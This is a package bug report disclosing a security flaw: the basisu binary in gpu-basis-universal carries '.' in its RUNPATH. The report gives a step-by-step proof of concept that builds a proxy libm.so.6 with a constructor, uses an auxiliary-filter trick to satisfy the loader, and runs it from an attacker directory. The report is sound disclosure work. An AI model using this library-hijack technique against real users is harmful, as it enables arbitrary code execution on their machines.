Package: gpu-basis-universal
Version: 2.0.2-4
Severity: important
Tags: security
*Summary:*
The gpu-basis-universal package installs the executable:
/usr/bin/basisu
This binary is built with the following RUNPATH:
RUNPATH [.]
Including the current working directory (".") in RUNPATH causes the dynamic
loader to include the process working directory in its library search path.
As a result, an attacker may be able to achieve arbitrary code execution by
placing a malicious shared library in a directory and inducing a victim to
execute basisu from that location.
This issue falls under CWE-427 (Uncontrolled Search Path Element).
*Impact:*
If a user executes basisu while their current working directory is
attacker-controlled (for example, a downloaded archive, extracted project,
shared workspace, mounted dataset, or /tmp directory), the dynamic loader
may resolve shared library dependencies from that directory.
An attacker who can place a malicious shared library in such a location may
be able to achieve arbitrary code execution in the security context of the
user running basisu.
Code execution occurs during dynamic library loading, prior to execution of
the program's main() function.
*Proof of Concept:*
*1. Verify the RUNPATH*
$ readelf -d /usr/bin/basisu | grep RUNPATH
Output:
0x000000000000001d (RUNPATH) Library runpath: [.]
*2. Create a Malicious Library*
$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << 'EOF' > poc_basisu.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void exploit() {
printf("\n[!!!] BASISU HIJACK SUCCESSFUL [!!!]\n");
exit(0);
}
EOF
*3. Build a Proxy Library*
The binary expects symbols and version information from libm.so.6. To
satisfy those requirements while still obtaining code execution, a proxy
library can be constructed using the ELF auxiliary filter mechanism.
$ cat << 'EOF' > versions.map
GLIBC_2.17 { };
GLIBC_2.27 { };
GLIBC_2.29 { };
GLIBC_2.38 { };
EOF
$ gcc -shared -fPIC poc_basisu.c \
-o libm.so.6 \
-Wl,-f,/lib/aarch64-linux-gnu/libm.so.6 \
-Wl,--version-script=versions.map
*4. Execute basisu*
$ cd /tmp/malicious_workspace
$ basisu
*Result:*
[!!!] BASISU HIJACK SUCCESSFUL [!!!]
The attacker-controlled libm.so.6 is loaded and its constructor executes
during dynamic linking.
*Additional Verification:*
Dynamic linker debugging confirms that the current working directory is
searched as a result of the embedded RUNPATH:
$ LD_DEBUG=libs basisu 2>&1 | grep -A 3 libm.so.6
*Example output:*
find library=libm.so.6 [0]; searching
search path=. (RUNPATH from file /usr/bin/basisu)
trying file=./libm.so.6
This demonstrates that the dynamic loader attempts to resolve libm.so.6
from the current working directory.
*Expected Fix:*
The package should not ship binaries containing "." in RUNPATH.
The RUNPATH entry should be removed or replaced with an explicit trusted
library path so that the current working directory is not searched during
dependency resolution.
